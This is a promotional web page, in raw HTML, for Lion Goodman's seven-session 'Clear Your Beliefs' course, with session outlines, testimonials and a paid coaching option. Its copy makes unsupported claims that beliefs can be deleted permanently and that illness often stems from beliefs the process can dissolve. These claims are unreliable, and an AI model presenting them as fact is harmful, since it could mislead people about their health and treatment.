from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the 